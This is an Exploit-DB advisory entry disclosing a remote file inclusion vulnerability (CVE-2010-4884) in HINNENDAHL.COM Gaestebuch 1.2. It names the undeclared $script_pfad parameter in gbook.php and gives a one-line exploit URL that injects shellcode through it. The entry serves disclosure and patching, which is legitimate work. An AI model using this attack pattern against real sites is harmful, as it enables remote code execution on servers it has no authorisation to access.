Gaestebuch 1.2 - Remote File Inclusion

EDB-ID:

14810

CVE:

2010-4884

EDB Verified:

Author:

bd0rk

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-08-26

Vulnerable App:

                ########################################################
                #                                                      #
                #          HINNENDAHL.COM Gaestebuch 1.2               #
                #                                                      #
                #       Remote File Inclusion Vulnerability            #
                #                                                      #
                #                 by bd0rk || SOH-Crew                 #                                     #                                                      #
                #                  www.soh-crew.it.tt                  #
                #                                                      #
                #            Contact: bd0rk[at]hackermail.com          #
                #                                                      #
                ########################################################


[~] Affected-Software: HINNENDAHL.COM Gaestebuch 1.2

[~] Vendor: http://www.hinnendahl.com/

[~] Download: http://www.hinnendahl.com/index.php?seite=download

[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s


Description: The $script_pfad parameter in /guestbook/gbook.php
             isn't declared before require. So an attacker can execute some
             php-shellcode about it. (line 3 - 4)



[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]



### The 21 years old, german Hacker bd0rk ### <---white-hat :-)

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services